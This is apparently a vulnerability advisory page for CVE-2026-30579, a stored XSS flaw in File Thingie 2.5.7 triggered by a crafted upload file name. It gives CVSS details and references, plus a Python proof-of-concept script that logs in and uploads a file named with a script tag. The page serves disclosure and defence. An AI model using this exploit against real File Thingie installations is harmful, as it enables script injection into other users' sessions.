CVE-2026-30579

Description

File Thingie 2.5.7 is vulnerable to Cross Site Scripting (XSS). A malicious user can leverage the "upload file" functionality to upload a file with a crafted file name used to trigger a Javascript payload.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:leefish:file_thingie:2.5.7:*:*:*:*:*:*:* - VULNERABLE

File Thingie 2.5.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://example.com/filethingie/ft2.php"

# Attacker credentials (Low privilege required)
username = "attacker"
password = "password"

# Malicious filename containing XSS payload
# The application reflects the filename directly in the UI
malicious_filename = "<script>alert('CVE-2026-30579_XSS');</script>.txt"

# Create a session to handle cookies
session = requests.Session()

# 1. Login to get a valid session
login_data = {
    "username": username,
    "password": password,
    "submit": "Login"
}
session.post(target_url, data=login_data)

# 2. Prepare file upload
# The filename is where the injection happens
files = {
    'file': (malicious_filename, b'Content of the file', 'text/plain')
}
upload_data = {
    'action': 'upload',
    'submit': 'Upload'
}

# 3. Send the malicious request
response = session.post(target_url, files=files, data=upload_data)

if response.status_code == 200:
    print("[+] Potential upload successful.")
    print("[+] Check the file list page to trigger the XSS.")
else:
    print("[-] Upload failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30579
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30579
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30579/
[4] VulDB https://vuldb.com/cve/CVE-2026-30579
[5] https://github.com/SpeWnz/Vulnerability-Research/tree/main/CVE-2026-30579
[6] https://github.com/leefish/filethingie

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30579", "sourceIdentifier": "[email protected]", "published": "2026-03-20T18:16:13.323", "lastModified": "2026-04-01T19:01:22.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "File Thingie 2.5.7 is vulnerable to Cross Site Scripting (XSS). A malicious user can leverage the \"upload file\" functionality to upload a file with a crafted file name used to trigger a Javascript payload."}, {"lang": "es", "value": "File Thingie 2.5.7 es vulnerable a Cross Site Scripting (XSS). Un usuario malicioso puede aprovechar la funcionalidad de 'subir archivo' para subir un archivo con un nombre de archivo manipulado utilizado para activar una carga útil de Javascript."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:leefish:file_thingie:2.5.7:*:*:*:*:*:*:*", "matchCriteriaId": "AEFFC71B-7FE1-4570-AA17-5E9E300B8EA9"}]}]}], "references": [{"url": "https://github.com/SpeWnz/Vulnerability-Research/tree/main/CVE-2026-30579", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/leefish/filethingie", "source": "[email protected]", "tags": ["Product"]}]}}